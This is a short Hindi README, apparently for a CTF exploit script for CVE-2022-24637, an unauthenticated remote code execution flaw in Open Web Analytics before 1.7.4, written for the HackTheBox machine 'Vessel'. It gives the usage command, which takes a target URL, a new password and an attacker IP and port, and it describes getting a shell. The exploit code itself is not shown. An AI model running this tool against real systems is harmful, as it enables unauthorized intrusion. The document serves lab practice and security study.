
Open Web Analytics संस्करण <1.7.4 में अप्रमाणित RCE
ओपन वेब एनालिटिक्स संस्करण <1.7.4 में अप्रमाणित RCE
यह स्क्रिप्ट CVE-2022-24637 भेद्यता को स्वचालित करने के लिए बनाई गई है। मैंने इस शोषण को अपने Hackthebox मशीन वेसल के लिए बनाया है। https://app.hackthebox.com/machines/Vessel
यह शोषण और विचार https://devel0pment.de/?p=2494 पर आधारित है।
स्क्रिप्ट को निम्नलिखित पैरामीटर्स के साथ चलाएँ:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
शेल पाने के लिए इसे कुछ बार चलाने की आवश्यकता हो सकती है।
स्क्रिप्ट में सुधार किया जा सकता है।
